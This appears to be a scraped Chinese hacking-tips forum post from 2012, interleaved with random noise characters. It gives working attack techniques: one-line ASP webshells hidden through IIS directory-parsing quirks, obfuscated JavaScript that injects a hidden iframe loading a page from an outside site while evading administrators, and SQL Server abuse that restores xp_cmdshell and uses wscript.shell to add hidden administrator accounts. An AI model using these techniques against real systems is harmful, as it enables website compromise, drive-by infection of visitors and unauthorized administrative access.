- D0 Q5 v$ r# `1 Y2 G* q# e拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
1 r( x& `# O! d& A. O4 U" T; s通过web访问ASP木马:http://ip/images../news.asp?action=login
" f4 [5 _5 m: I b( `: J& F如何删除非标准目录:rmdir images..\ /s
4 T( e8 t2 m I1 t) r# V7 ^" d2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:' P! W* o9 Z0 }6 C( q
mkdir programme.asp& ^7 p: n; k9 }0 C& g% V- @9 D7 Y
新建1.txt文件内容:<!--#include file=”12.jpg”-->
, i, \+ \: s/ E8 B新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
; J& w* W O3 ?( \% Tattrib +H +S programme.asp9 C8 y$ Q( Y; z4 ?. O3 L
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
* C P2 X% _+ g8 \6 C& k" [+ V( g' n a$ U* Q( x0 |8 J; l% S5 a
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。 M: F" B' {0 w' K1 U" }
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。) D1 g3 S5 _9 t
2 J: @; f& l7 p3 F
55、JS隐蔽挂马
& ~9 T. [4 l# z8 A4 y1 B6 @1.
6 d' H u- Y q* o, \" ivar tr4c3="<iframe src=ht";9 A; |2 W j5 |7 E a
tr4c3 = tr4c3+"tp:/";, ^0 I" K/ {/ _) S
tr4c3 = tr4c3+"/ww";
& n. L( t O+ N: P5 {% Ntr4c3 = tr4c3+"w.tr4";
& H7 d0 W. ~( Str4c3 = tr4c3+"c3.com/inc/m";
& n, \, j/ g6 r; Z7 Gtr4c3 = tr4c3+"m.htm style="display:none"></i";
# o/ A/ `' D$ y# J/ _$ _; r& ?tr4c3 =tr4c3+"frame>'";
: x2 Q6 g- e& ~7 w+ \" u- J7 t4 m9 [document.write(tr4c3);! |1 o$ X6 o; u8 `- j
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
9 ]5 D' h, L. q/ F' a4 k) }* ~3 K! v( _5 Z
2.
+ a! w: V5 N6 j转换进制,然后用EVAL执行。如
' Z# h+ `: |8 m8 Y$ Ceval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
# v$ j X: i9 H; d; r$ B6 H不过这个有点显眼。 m8 I! w. y- }
3.
5 r- k( W0 [( q! i( U9 ?- ddocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
, K9 e7 [8 q2 u5 L9 @最后一点,别忘了把文件的时间也修改下。
( e) ?: j" v+ u9 M8 y8 ]: ^
3 J3 X$ s5 w- d" T1 ~! j# I8 V56.3389终端入侵常用DOS命令5 j- A; d9 M9 g" j$ H
taskkill taskkill /PID 1248 /t2 B* k0 ~ L* }4 w' w3 ~+ I
# B( z& {5 u `( v, _: Otasklist 查进程
' r& a+ ?( m9 C1 o; |/ U/ J5 {8 ^/ X m: O
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
; |' ~+ F9 S" U4 y' G4 ]iisreset /reboot
" _9 s9 c0 U& l/ h) p% {1 c% ktsshutdn /reboot /delay:1 重起服务器
, }" _8 q/ X5 { o% z) |7 D" |' v+ ]/ l. D7 p1 {4 e* N, _
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
6 r/ B3 }/ c& e' D8 }7 F" b" q) N! E: ^3 `; Q6 q
query user 查看当前终端用户在线情况3 ~8 H' P/ i3 ]
( H) x8 C+ u- v! u. U0 c1 o; @
要显示有关所有会话使用的进程的信息,请键入:query process *
; o# T8 r5 U% A7 k. n- A$ K0 h! y% h' ~ C* T3 Q3 ^6 _
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
' N) Z" D& c! d6 J( P# j; p; l2 t+ h' m! M, K3 |1 J+ X8 k0 d8 v: @
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2$ ~4 R+ e+ c7 C: o5 [
- m: q8 `1 f4 {2 f3 O
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
1 p( _2 O o: }% K& R: m. W3 E: S9 T( r3 o1 M7 ?
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启& M3 J1 s+ W: T3 T# G2 X( V
2 ]( @1 ]+ B0 w% L命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统5 J! }7 x- _' p
$ e* B% d* t+ O- J) t& }# C6 a命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
4 _/ O t& L' ]6 s6 G$ _- |% {( _9 I1 w4 z9 ]$ V
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
+ y P5 o& q1 R( [& v. k' ]0 X5 l" P8 k( O
56、在地址栏或按Ctrl+O,输入:# i3 q7 c3 y3 h* K2 ~+ a8 k
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
: a; `. ^% H7 m
; m1 g8 L% Z1 x. d. U源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
6 ^* y/ U- Q) A" u/ U
$ j. A2 r. H: }! W. }' {' e. O! x57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
( n9 j0 v1 t+ C/ s' s( ? `用net localgroup administrators是可以看到管理组下,加了$的用户的。
6 f( @" x8 E* ^3 r0 ?
- A2 X" }" w$ J1 N58、 sa弱口令相关命令, }' j; ~4 {) ?/ I5 S* w
1 A1 M3 k" f! q
一.更改sa口令方法:- p+ N$ a$ j' t
用sql综合利用工具连接后,执行命令:
' P& c; Q9 }8 L( P1 sexec sp_password NULL,'20001001','sa'
4 [. p: I7 j% n) j* o(提示:慎用!)) \; X# g7 p, i0 t( l
/ j" l+ f! ]4 O
二.简单修补sa弱口令.. f& X" N* u! L, @8 m4 v- C
' y$ k: C. b* y& h0 q6 ~
方法1:查询分离器连接后执行: l( G+ O* q8 ?/ N" B
if exists (select * from8 ~! s, P+ T, e1 N; ?* d( ~
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
& [+ c: j4 c5 _5 e$ hOBJECTPROPERTY(id, N'IsExtendedProc') = 1)4 b& v3 r/ d; `% {; o: j2 R% I
X; @6 s: s0 \) S& `exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'2 g2 w+ x$ q1 ?$ Y6 F z, {: @2 m
% J2 E) }6 r6 ?+ y0 t& b, FGO4 ?* e% L3 T7 U0 ]" N+ B
5 [* h4 |4 e4 u
然后按F5键命令执行完毕, H0 G" G9 }4 D0 c( e+ s
; B& D5 A* \0 l s方法2:查询分离器连接后
4 f" E0 Z/ i1 E X4 |- V$ c, H第一步执行:use master
1 U5 O- g4 P2 O8 S; w. L2 m6 ^第二步执行:sp_dropextendedproc 'xp_cmdshell'
F3 {8 D6 ]+ m: _% Y然后按F5键命令执行完毕+ B! h; M1 I: c$ L2 g
9 i3 f. o! a. I; E/ [
k% b7 s3 N, ?/ D5 Z
三.常见情况恢复执行xp_cmdshell.5 T& }% V0 c7 Z. A- c& I: d" Y4 S
( V; Q* I" A7 d( v! N0 w' [
3 \5 u( l4 b* r$ F1 未能找到存储过程'master..xpcmdshell'.
9 o( \& y/ k3 |) n- A: x 恢复方法:查询分离器连接后,
+ E9 x3 O+ j( a第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
# a' b- Y: [. Z+ r: \) I第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 h$ L& J2 m# R2 j, p0 t) ]然后按F5键命令执行完毕
' p) f7 O/ K' u4 ?4 X l5 E; Y. e X, v3 [7 h
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
- @6 a0 ~ E: E恢复方法:查询分离器连接后,
, j. k% {9 N( {: g- E' F第一步执行:sp_dropextendedproc "xp_cmdshell"
8 ~- _$ `5 g) c0 u7 |4 X第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' j7 j$ u9 |1 i0 Z2 K
然后按F5键命令执行完毕+ X% _6 _* H* I2 |( D
% ~3 M4 W5 w. Q# O2 H9 W# G
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
6 |+ I$ e. E; L% A恢复方法:查询分离器连接后,9 Q+ ]& d9 L- Z4 l
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
( V& j, B0 d/ |5 `2 W$ T3 L第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
2 I; B; u3 X- K0 p: H3 S: A然后按F5键命令执行完毕+ d% p1 V' U7 i1 ^9 d; T7 w
; v0 {4 d6 d4 F ?3 L8 y3 _- h
四.终极方法.% u2 u& X0 v+ c$ Y
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:$ K' C" q+ x ]6 E
查询分离器连接后,
0 {% ]$ ^- p2 b& i/ U2 D2000servser系统:) s" I2 n: t# y+ E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
/ G5 D7 _+ I6 {
% m! l9 U/ {: K# a) g/ Pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
9 |; _# ^! {9 Y8 `# k: Q1 x: Z$ m b
xp或2003server系统:. [! p5 U/ O& q. B9 Y' v( x9 [
9 J6 q8 O( ^4 ^9 adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
0 ~# e; R# u7 r( e6 J2 K+ G& U w: |: I# Z/ P. `) S0 e) P: ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'1 |2 ] |( P$ q
|
发表于 2012-9-15 14:13:15
收藏
支持
反对